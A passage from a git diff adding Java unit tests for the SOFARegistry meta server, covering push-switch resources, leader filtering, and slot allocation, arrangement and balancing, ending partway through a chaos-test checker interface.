+import com.alipay.sofa.registry.server.meta.provide.data.DefaultProvideDataNotifier; +import com.alipay.sofa.registry.server.meta.provide.data.ProvideDataService; +import com.alipay.sofa.registry.store.api.DBResponse; +import com.alipay.sofa.registry.store.api.OperationStatus; +import com.google.common.collect.Sets; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; + +public class StopPushDataResourceTest { + + private StopPushDataResource stopPushDataResource; + + private DefaultProvideDataNotifier dataNotifier; + + private ProvideDataService provideDataService = + spy(new AbstractMetaServerTestBase.InMemoryProvideDataRepo()); + + @Before + public void beforeStopPushDataResourceTest() { + dataNotifier = mock(DefaultProvideDataNotifier.class); + stopPushDataResource = + new StopPushDataResource() + .setProvideDataNotifier(dataNotifier) + .setProvideDataService(provideDataService); + } + + @Test + public void testClosePush() { + stopPushDataResource.closePush(); + verify(dataNotifier, times(1)).notifyProvideDataChange(any()); + DBResponse dbResponse = + provideDataService.queryProvideData( + DataInfo.valueOf(ValueConstants.STOP_PUSH_DATA_SWITCH_DATA_ID).getDataInfoId()); + Assert.assertEquals(OperationStatus.SUCCESS, dbResponse.getOperationStatus()); + PersistenceData persistenceData = dbResponse.getEntity(); + Assert.assertTrue(Boolean.parseBoolean(persistenceData.getData())); + } + + @Test + public void testOpenPush() { + stopPushDataResource.openPush(); + verify(dataNotifier, times(1)).notifyProvideDataChange(any()); + DBResponse dbResponse = + provideDataService.queryProvideData( + DataInfo.valueOf(ValueConstants.STOP_PUSH_DATA_SWITCH_DATA_ID).getDataInfoId()); + Assert.assertEquals(OperationStatus.SUCCESS, dbResponse.getOperationStatus()); + PersistenceData persistenceData = dbResponse.getEntity(); + Assert.assertFalse(Boolean.parseBoolean(persistenceData.getData())); + } + + @Test + public void testGetNodeTypes() { + Assert.assertEquals( + Sets.newHashSet(Node.NodeType.SESSION), stopPushDataResource.getNodeTypes()); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/resource/filter/LeaderAwareFilterTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/resource/filter/LeaderAwareFilterTest.java new file mode 100644 index 000000000..de8155ea4 --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/resource/filter/LeaderAwareFilterTest.java @@ -0,0 +1,63 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.resource.filter; + +import static org.junit.Assert.*; +import static org.mockito.Mockito.mock; +import static org.mockito.Mockito.when; + +import com.alipay.sofa.registry.common.model.store.URL; +import com.alipay.sofa.registry.remoting.jersey.JerseyClient; +import com.alipay.sofa.registry.server.meta.AbstractH2DbTestBase; +import com.alipay.sofa.registry.server.meta.MetaLeaderService; +import com.alipay.sofa.registry.util.DatumVersionUtil; +import java.io.IOException; +import java.net.URISyntaxException; +import javax.ws.rs.core.MediaType; +import javax.ws.rs.core.Response; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; +import org.springframework.beans.factory.annotation.Autowired; + +public class LeaderAwareFilterTest extends AbstractH2DbTestBase { + + @Autowired private LeaderAwareFilter leaderAwareFilter; + + private MetaLeaderService metaLeaderService; + + @Before + public void beforeLeaderAwareFilterTest() { + metaLeaderService = mock(MetaLeaderService.class); + leaderAwareFilter.setMetaLeaderService(metaLeaderService); + } + + @Test + public void testFilter() throws IOException, URISyntaxException { + when(metaLeaderService.amILeader()).thenReturn(false).thenReturn(true); + when(metaLeaderService.getLeader()).thenReturn("127.0.0.1"); + when(metaLeaderService.getLeaderEpoch()).thenReturn(DatumVersionUtil.nextId()); + Response response = + JerseyClient.getInstance() + .connect(new URL("127.0.0.1", 9615)) + .getWebTarget() + .path("openapi/v1/slot/table/reconcile/status") + .request(MediaType.APPLICATION_JSON_TYPE) + .get(); + Assert.assertEquals(200, response.getStatus()); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/arrange/CrossDcSlotAllocatorTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/arrange/CrossDcSlotAllocatorTest.java new file mode 100644 index 000000000..fb7297f9d --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/arrange/CrossDcSlotAllocatorTest.java @@ -0,0 +1,171 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.slot.arrange; + +import static org.mockito.Mockito.*; + +import com.alipay.sofa.registry.common.model.metaserver.nodes.MetaNode; +import com.alipay.sofa.registry.common.model.slot.Slot; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.exception.InitializeException; +import com.alipay.sofa.registry.exception.StartException; +import com.alipay.sofa.registry.exception.StopException; +import com.alipay.sofa.registry.lifecycle.LifecycleState; +import com.alipay.sofa.registry.lifecycle.impl.LifecycleHelper; +import com.alipay.sofa.registry.remoting.exchange.Exchange; +import com.alipay.sofa.registry.server.meta.AbstractMetaServerTestBase; +import com.alipay.sofa.registry.server.meta.MetaLeaderService; +import com.alipay.sofa.registry.server.meta.metaserver.CrossDcMetaServer; +import java.util.concurrent.TimeoutException; +import org.assertj.core.util.Lists; +import org.junit.After; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; +import org.mockito.Mock; +import org.mockito.MockitoAnnotations; + +public class CrossDcSlotAllocatorTest extends AbstractMetaServerTestBase { + + private CrossDcSlotAllocator allocator; + + @Mock private CrossDcMetaServer crossDcMetaServer; + + @Mock private Exchange exchange; + + @Mock private MetaLeaderService leaderElector; + + @Before + public void beforeCrossDcSlotAllocatorTest() throws Exception { + MockitoAnnotations.initMocks(this); + when(crossDcMetaServer.getClusterMembers()) + .thenReturn(Lists.newArrayList(new MetaNode(randomURL(), getDc()))); + when(crossDcMetaServer.getClusterMembers()) + .thenReturn(Lists.newArrayList(new MetaNode(randomURL(), getDc()))); + allocator = + spy( + new CrossDcSlotAllocator( + getDc(), scheduled, exchange, crossDcMetaServer, leaderElector)); + } + + @After + public void afterCrossDcSlotAllocatorTest() throws Exception { + LifecycleHelper.stopIfPossible(allocator); + LifecycleHelper.disposeIfPossible(allocator); + } + + @Test + public void testGetSlotTable() + throws TimeoutException, InterruptedException, InitializeException, StartException { + LifecycleHelper.initializeIfPossible(allocator); + LifecycleHelper.startIfPossible(allocator); + Assert.assertNull(allocator.getSlotTable()); + + when(exchange.getClient(Exchange.META_SERVER_TYPE)) + .thenReturn( + getRpcClient( + scheduled, + 1, + new SlotTable( + System.currentTimeMillis(), + Lists.newArrayList( + new Slot( + 1, + "10.0.0.1", + System.currentTimeMillis(), + Lists.newArrayList("10.0.0.2")))))); + allocator.refreshSlotTable(0); + waitConditionUntilTimeOut(() -> allocator.getSlotTable() != null, 1000); + + Assert.assertNotNull(allocator.getSlotTable()); + Assert.assertEquals("10.0.0.1", allocator.getSlotTable().getSlot(1).getLeader()); + } + + @Test + public void testTestGetDc() { + Assert.assertEquals(getDc(), allocator.getDc()); + } + + @Test + public void testRefreshSlotTableFirstFailure() + throws TimeoutException, InterruptedException, StartException, InitializeException { + LifecycleHelper.initializeIfPossible(allocator); + LifecycleHelper.startIfPossible(allocator); + Assert.assertNull(allocator.getSlotTable()); + + when(exchange.getClient(Exchange.META_SERVER_TYPE)) + .thenReturn(getRpcClient(scheduled, 3, new TimeoutException("expected timeout"))) + .thenReturn( + getRpcClient( + scheduled, + 1, + new SlotTable( + System.currentTimeMillis(), + Lists.newArrayList( + new Slot( + 1, + "10.0.0.1", + System.currentTimeMillis(), + Lists.newArrayList("10.0.0.2")))))); + allocator.refreshSlotTable(0); + waitConditionUntilTimeOut(() -> allocator.getSlotTable() != null, 1000); + + Assert.assertNotNull(allocator.getSlotTable()); + Assert.assertEquals("10.0.0.1", allocator.getSlotTable().getSlot(1).getLeader()); + } + + @Test + public void testRefreshSlotTableRetryOverTimes() + throws TimeoutException, InterruptedException, StartException, InitializeException { + LifecycleHelper.initializeIfPossible(allocator); + LifecycleHelper.startIfPossible(allocator); + + Assert.assertNull(allocator.getSlotTable()); + + when(exchange.getClient(Exchange.META_SERVER_TYPE)) + .thenReturn(getRpcClient(scheduled, 3, new TimeoutException("expected timeout"))); + + allocator.refreshSlotTable(0); + Thread.sleep(100); + + Assert.assertNull(allocator.getSlotTable()); + verify(allocator, atLeast(2)).refreshSlotTable(anyInt()); + } + + @Test + public void testDoInitialize() throws InitializeException { + LifecycleHelper.initializeIfPossible(allocator); + Assert.assertEquals( + LifecycleState.LifecyclePhase.INITIALIZED, allocator.getLifecycleState().getPhase()); + } + + @Test + public void testDoStart() throws InitializeException, StopException, StartException { + LifecycleHelper.initializeIfPossible(allocator); + LifecycleHelper.startIfPossible(allocator); + Assert.assertEquals( + LifecycleState.LifecyclePhase.STARTED, allocator.getLifecycleState().getPhase()); + verify(allocator, never()).refreshSlotTable(anyInt()); + verify(allocator, times(1)).doStart(); + } + + @Test + public void testDoStop() {} + + @Test + public void testDoDispose() {} +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/arrange/ScheduledSlotArrangerTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/arrange/ScheduledSlotArrangerTest.java new file mode 100644 index 000000000..aa3f12a96 --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/arrange/ScheduledSlotArrangerTest.java @@ -0,0 +1,105 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.slot.arrange; + +import static org.mockito.Mockito.spy; +import static org.mockito.Mockito.when; + +import com.alipay.sofa.registry.server.meta.AbstractMetaServerTestBase; +import com.alipay.sofa.registry.server.meta.lease.data.DefaultDataServerManager; +import com.alipay.sofa.registry.server.meta.monitor.SlotTableMonitor; +import com.alipay.sofa.registry.server.meta.resource.SlotTableResource; +import com.alipay.sofa.registry.server.meta.slot.SlotManager; +import java.util.concurrent.CountDownLatch; +import java.util.concurrent.CyclicBarrier; +import java.util.concurrent.atomic.AtomicInteger; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; +import org.mockito.Mock; +import org.mockito.MockitoAnnotations; + +public class ScheduledSlotArrangerTest extends AbstractMetaServerTestBase { + + private ScheduledSlotArranger slotArranger; + + private SlotTableResource slotTableResource; + + @Mock private DefaultDataServerManager dataServerManager; + + @Mock private SlotManager slotManager; + + @Mock private SlotTableMonitor slotTableMonitor; + + @Before + public void beforeScheduledSlotArrangerTest() { + MockitoAnnotations.initMocks(this); + when(metaLeaderService.amILeader()).thenReturn(true); + when(metaLeaderService.amIStableAsLeader()).thenReturn(true); + slotArranger = + spy( + new ScheduledSlotArranger( + dataServerManager, slotManager, slotTableMonitor, metaLeaderService)); + } + + @Test + public void testTryLock() throws InterruptedException { + Assert.assertTrue(slotArranger.tryLock()); + slotArranger.unlock(); + Assert.assertTrue(slotArranger.tryLock()); + slotArranger.unlock(); + AtomicInteger counter = new AtomicInteger(); + int tasks = 100; + CyclicBarrier barrier = new CyclicBarrier(tasks); + CountDownLatch latch = new CountDownLatch(tasks); + for (int i = 0; i < tasks; i++) { + executors.execute( + new Runnable() { + @Override + public void run() { + try { + barrier.await(); + if (slotArranger.tryLock()) { + counter.incrementAndGet(); + } + } catch (Throwable th) { + + } finally { + latch.countDown(); + } + } + }); + } + latch.await(); + Assert.assertEquals(1, counter.get()); + } + + @Test + public void testStopStartReconcile() throws Exception { + slotTableResource = + new SlotTableResource( + slotManager, slotTableMonitor, dataServerManager, slotArranger, metaLeaderService); + slotArranger.postConstruct(); + Assert.assertEquals("running", slotTableResource.getReconcileStatus().getMessage()); + + slotTableResource.stopSlotTableReconcile(); + Assert.assertEquals("stopped", slotTableResource.getReconcileStatus().getMessage()); + + slotTableResource.startSlotTableReconcile(); + Assert.assertEquals("running", slotTableResource.getReconcileStatus().getMessage()); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/assigner/DefaultSlotAssignerTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/assigner/DefaultSlotAssignerTest.java new file mode 100644 index 000000000..2e350e4e3 --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/assigner/DefaultSlotAssignerTest.java @@ -0,0 +1,123 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.slot.assigner; + +import com.alipay.sofa.registry.common.model.metaserver.nodes.DataNode; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.server.meta.AbstractMetaServerTestBase; +import com.alipay.sofa.registry.server.meta.slot.balance.DefaultSlotBalancer; +import com.alipay.sofa.registry.server.meta.slot.util.builder.SlotTableBuilder; +import com.alipay.sofa.registry.server.shared.util.NodeUtils; +import com.alipay.sofa.registry.test.TestUtils; +import com.alipay.sofa.registry.util.StringFormatter; +import com.google.common.collect.Lists; +import java.util.LinkedList; +import java.util.List; +import java.util.Random; +import org.junit.Test; + +public class DefaultSlotAssignerTest { + private static final Logger LOGGER = LoggerFactory.getLogger(DefaultSlotAssignerTest.class); + private static final Random RANDOM = new Random(); + + @Test + public void testAssign() { + for (int slotNum = 2; slotNum <= 256; slotNum++) { + for (int slotReplicas = 2; slotReplicas <= 2; slotReplicas++) { + for (int dataNum = 2; dataNum < 20 && dataNum < slotNum; dataNum++) { + for (int downNum = 1; downNum < dataNum / 2; downNum++) { + testAssign(downNum, dataNum, slotNum, slotReplicas, false); + testAssign(downNum, dataNum, slotNum, slotReplicas, true); + } + } + } + } + } + + // @Test + // public void testAssign1() { + // for (int dataNum = 2; dataNum < 50 && dataNum < 21; dataNum++) { + // for (int downNum = 1; downNum < dataNum; downNum++) { + // testAssign(downNum, dataNum, 4, 2); + // } + // } + // } + + public void testAssign(int downNum, int dataNum, int slotNum, int slotReplicas, boolean random) { + LOGGER.info("#################################################################"); + String tag = + StringFormatter.format( + "#####testCase: down={}, data={}, slot={}, replicas={}, rand={}", + downNum, + dataNum, + slotNum, + slotReplicas, + random); + LOGGER.info(tag); + List dataNodes = TestUtils.createDataNodes(dataNum); + SlotTable prev = AbstractMetaServerTestBase.randomSlotTable(dataNodes, slotNum, slotReplicas); + // LOGGER.info("randSlotTable: maxGap={}, leaderGap={}, table={}", + // AbstractMetaServerTest.maxSlotGap(prev, dataNodes), + // AbstractMetaServerTest.maxLeaderGap(prev, dataNodes),prev); + // LOGGER.info("randDataNode:{}", prev.transfer(null,false)); + LinkedList currentDataNodeIps = + Lists.newLinkedList(NodeUtils.transferNodeToIpList(dataNodes)); + TestUtils.assertBalance(prev, currentDataNodeIps, slotNum, slotReplicas, false, tag); + + SlotTableBuilder slotTableBuilder = new SlotTableBuilder(prev, slotNum, slotReplicas); + List downs = Lists.newArrayList(); + if (!random) { + for (int i = 0; i < downNum; i++) { + downs.add(currentDataNodeIps.removeFirst()); + } + } else { + for (int i = 0; i < downNum; i++) { + int randIdx = RANDOM.nextInt(currentDataNodeIps.size()); + downs.add(currentDataNodeIps.remove(randIdx)); + } + } + // LOGGER.info("downs={}", downs); + // one dataServer down + slotTableBuilder.init(currentDataNodeIps); + for (String down : downs) { + slotTableBuilder.removeDataServerSlots(down); + } + DefaultSlotAssigner assigner = new DefaultSlotAssigner(slotTableBuilder, currentDataNodeIps); + SlotTable assign = assigner.assign(); + // LOGGER.info("assignSlotTable: maxGap={}, leaderGap={}, table={}", + // AbstractMetaServerTest.maxSlotGap(assign, dataNodes), + // AbstractMetaServerTest.maxLeaderGap(assign, dataNodes), + // assign); + // LOGGER.info("assignDataNode:{}", assign.transfer(null,false)); + TestUtils.assertBalance(assign, currentDataNodeIps, slotNum, slotReplicas, false, tag); + + // balance the slot + slotTableBuilder = new SlotTableBuilder(assign, slotNum, slotReplicas); + slotTableBuilder.init(currentDataNodeIps); + + DefaultSlotBalancer balancer = new DefaultSlotBalancer(slotTableBuilder, currentDataNodeIps); + for (int i = 0; i < slotNum; i++) { + if (balancer.balance() == null) { + break; + } + } + SlotTable balance = slotTableBuilder.build(); + TestUtils.assertBalance(balance, currentDataNodeIps, slotNum, slotReplicas, true, tag); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/balance/DefaultSlotBalancerTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/balance/DefaultSlotBalancerTest.java new file mode 100644 index 000000000..2b2ac212e --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/balance/DefaultSlotBalancerTest.java @@ -0,0 +1,107 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.slot.balance; + +import static org.mockito.Mockito.mock; +import static org.mockito.Mockito.when; + +import com.alipay.sofa.registry.common.model.metaserver.cluster.VersionedList; +import com.alipay.sofa.registry.common.model.metaserver.nodes.DataNode; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.server.meta.AbstractMetaServerTestBase; +import com.alipay.sofa.registry.server.meta.bootstrap.config.NodeConfig; +import com.alipay.sofa.registry.server.meta.lease.data.DataServerManager; +import com.alipay.sofa.registry.server.meta.monitor.SlotTableMonitor; +import com.alipay.sofa.registry.server.meta.slot.manager.SimpleSlotManager; +import com.alipay.sofa.registry.server.meta.slot.util.builder.SlotBuilder; +import com.alipay.sofa.registry.server.meta.slot.util.builder.SlotTableBuilder; +import com.alipay.sofa.registry.server.shared.util.NodeUtils; +import com.alipay.sofa.registry.util.DatumVersionUtil; +import java.util.List; +import org.assertj.core.util.Lists; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; + +public class DefaultSlotBalancerTest extends AbstractMetaServerTestBase { + + private DefaultSlotBalancer slotBalancer; + + private SimpleSlotManager slotManager; + + private DataServerManager dataServerManager; + + private SlotTableMonitor slotTableMonitor; + + @Before + public void beforeDefaultSlotBalancerTest() { + NodeConfig nodeConfig = mock(NodeConfig.class); + when(nodeConfig.getLocalDataCenter()).thenReturn(getDc()); + slotManager = new SimpleSlotManager(); + dataServerManager = mock(DataServerManager.class); + slotTableMonitor = mock(SlotTableMonitor.class); + } + + @Test + public void testBalance() { + List dataNodes = + Lists.newArrayList( + new DataNode(randomURL("10.0.0.1"), getDc()), + new DataNode(randomURL("10.0.0.2"), getDc()), + new DataNode(randomURL("10.0.0.3"), getDc())); + when(dataServerManager.getDataServerMetaInfo()) + .thenReturn(new VersionedList<>(DatumVersionUtil.nextId(), dataNodes)); + + SlotTable slotTable = + randomSlotTable( + Lists.newArrayList( + new DataNode(randomURL("10.0.0.1"), getDc()), + new DataNode(randomURL("10.0.0.2"), getDc()))); + SlotTableBuilder slotTableBuilder = new SlotTableBuilder(slotTable, 16, 2); + slotTableBuilder.init(NodeUtils.transferNodeToIpList(dataNodes)); + + SlotBuilder sb = slotTableBuilder.getOrCreate(0); + replaceFollower(sb, "10.0.0.3"); + sb = slotTableBuilder.getOrCreate(1); + replaceFollower(sb, "10.0.0.3"); + sb = slotTableBuilder.getOrCreate(2); + replaceFollower(sb, "10.0.0.3"); + + slotManager.refresh(slotTableBuilder.build()); + slotBalancer = + new DefaultSlotBalancer( + slotTableBuilder, Lists.newArrayList("10.0.0.1", "10.0.0.2", "10.0.0.3")); + for (int i = 0; i < 10; i++) { + SlotTable slotTable1 = slotBalancer.balance(); + if (i == 0) { + Assert.assertNotNull(slotTable1); + } + if (slotTable1 == null) { + break; + } + logger.info("balance {}: {}", i, slotTable1); + assertSlotTableNoDupLeaderFollower(slotTable1); + } + } + + private static void replaceFollower(SlotBuilder sb, String follower) { + for (String f : sb.getFollowers()) { + sb.removeFollower(f); + } + sb.addFollower(follower); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/balance/LeaderOnlyBalancerTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/balance/LeaderOnlyBalancerTest.java new file mode 100644 index 000000000..66c2340e9 --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/balance/LeaderOnlyBalancerTest.java @@ -0,0 +1,137 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.slot.balance; + +import static org.mockito.Mockito.mock; +import static org.mockito.Mockito.when; + +import com.alipay.sofa.registry.common.model.metaserver.nodes.DataNode; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.common.model.store.URL; +import com.alipay.sofa.registry.server.meta.AbstractMetaServerTestBase; +import com.alipay.sofa.registry.server.meta.bootstrap.config.NodeConfig; +import com.alipay.sofa.registry.server.meta.slot.manager.SimpleSlotManager; +import com.alipay.sofa.registry.server.meta.slot.util.builder.SlotTableBuilder; +import com.alipay.sofa.registry.server.shared.util.NodeUtils; +import com.alipay.sofa.registry.util.StringFormatter; +import java.util.List; +import org.assertj.core.util.Lists; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; + +public class LeaderOnlyBalancerTest extends AbstractMetaServerTestBase { + + private SimpleSlotManager slotManager; + + private List currentDataServers; + + private SlotTableBuilder slotTableBuilder; + + private LeaderOnlyBalancer balancer; + + @Before + public void beforeLeaderOnlyBalancerTest() { + NodeConfig nodeConfig = mock(NodeConfig.class); + when(nodeConfig.getLocalDataCenter()).thenReturn(getDc()); + + currentDataServers = Lists.newArrayList("10.0.0.1", "10.0.0.2", "10.0.0.3"); + slotManager = new SimpleSlotManager(); + slotManager.setSlotNums(16); + slotManager.setSlotReplicas(1); + slotTableBuilder = new SlotTableBuilder(slotManager.getSlotTable(), 16, 1); + balancer = new LeaderOnlyBalancer(slotTableBuilder, currentDataServers); + balancer.setMaxMoveLeaderSlots(2); + } + + @Test + public void testBalance() { + String singleNode = currentDataServers.get(0); + for (int slotId = 0; slotId < 16; slotId++) { + slotTableBuilder.replaceLeader(slotId, singleNode); + } + slotTableBuilder.init(currentDataServers); + SlotTable prev = slotTableBuilder.build(); + SlotTable slotTable = balancer.balance(); + System.out.println("@@@" + slotTable); + Assert.assertEquals( + StringFormatter.format("servers={}, slots={}", currentDataServers, slotTable), + 1, + slotTable.transfer(currentDataServers.get(1), false).get(0).totalSlotNum()); + Assert.assertEquals( + StringFormatter.format("servers={}, slots={}", currentDataServers, slotTable), + 1, + slotTable.transfer(currentDataServers.get(2), false).get(0).totalSlotNum()); + + Assert.assertTrue( + isMoreBalanced( + prev, + slotTable, + Lists.newArrayList( + new DataNode(new URL("10.0.0.1"), getDc()), + new DataNode(new URL("10.0.0.2"), getDc()), + new DataNode(new URL("10.0.0.3"), getDc())))); + + slotTable = balancer.balance(); + Assert.assertEquals( + StringFormatter.format("servers={}, slots={}", currentDataServers, slotTable), + 2, + slotTable.transfer(currentDataServers.get(1), false).get(0).totalSlotNum()); + Assert.assertEquals( + StringFormatter.format("servers={}, slots={}", currentDataServers, slotTable), + 2, + slotTable.transfer(currentDataServers.get(2), false).get(0).totalSlotNum()); + + Assert.assertTrue( + isMoreBalanced( + prev, + slotTable, + Lists.newArrayList( + new DataNode(new URL("10.0.0.1"), getDc()), + new DataNode(new URL("10.0.0.2"), getDc()), + new DataNode(new URL("10.0.0.3"), getDc())))); + } + + @Test + public void testNoDataNodesNeedBalance() { + List dataNodes = randomDataNodes(3); + SlotTable slotTable = randomSlotTable(dataNodes); + currentDataServers = NodeUtils.transferNodeToIpList(dataNodes); + slotTableBuilder.init(currentDataServers); + slotManager.refresh(slotTable); + balancer = new LeaderOnlyBalancer(slotTableBuilder, currentDataServers); + Assert.assertNull(balancer.balance()); + } + + @Test + public void testFindDataServersNeedLeaderSlots() { + String singleNode = currentDataServers.get(0); + for (int slotId = 0; slotId < 16; slotId++) { + slotTableBuilder.replaceLeader(slotId, singleNode); + } + slotTableBuilder.init(currentDataServers); + // TODO + // Assert.assertFalse(balancer.findDataServersNeedLeaderSlots( + // SlotConfig.SLOT_NUM / currentDataServers.size()).isEmpty()); + // Set expected = Sets.newHashSet("10.0.0.2", "10.0.0.3"); + // Set actual = balancer.findDataServersNeedLeaderSlots(SlotConfig.SLOT_NUM + // / + // currentDataServers.size()); + // + // Assert.assertEquals(expected, actual); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/chaos/CheckerAction.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/chaos/CheckerAction.java new file mode 100644 index 000000000..6cfcac74c --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/chaos/CheckerAction.java @@ -0,0 +1,138 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.slot.chaos; + +import com.alipay.sofa.registry.common.model.Tuple; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.server.shared.slot.SlotTableUtils; +import com.alipay.sofa.registry.test.TestUtils; +import com.alipay.sofa.registry.util.MathUtils; +import com.alipay.sofa.registry.util.StringFormatter; +import java.util.*; +import java.util.Map.Entry; +import org.junit.Assert; + +/** + * @author xiaojian.xj + * @version $Id: CheckerAction.java, v 0.1 2021年02月03日 10:25 xiaojian.xj Exp $ + */ +public interface CheckerAction { + + boolean doCheck(SlotTable slotTable, List dataNodes, int slotNum, int replicas); + + default Tuple max(Map count) { + Optional> max = + count.entrySet().stream().max((Comparator.comparing(Entry::getValue))); + return new Tuple<>(max.get().getKey(), max.get().getValue()); + } + + default Tuple min(Map count) { + Optional> max = + count.entrySet().stream().min((Comparator.comparing(Entry::getValue))); + return new Tuple<>(max.get().getKey(), max.get().getValue()); + } + + default double average(Map count) { + OptionalDouble average = + count.entrySet().stream().mapToInt(entry -> entry.getValue()).average(); + return average.getAsDouble(); + } + + default int sum(Map count) { + return (int) count.entrySet().stream().mapToInt(entry -> entry.getValue()).sum(); + } +} + +class SlotLeaderChecker implements CheckerAction { + + private final Logger logger = LoggerFactory.getLogger(getClass()); + + @Override + public boolean doCheck(SlotTable slotTable, List dataNodes, int slotNum, int replicas) { + + Map leaderCount = SlotTableUtils.getSlotTableLeaderCount(slotTable); + logger.info("[slot leader 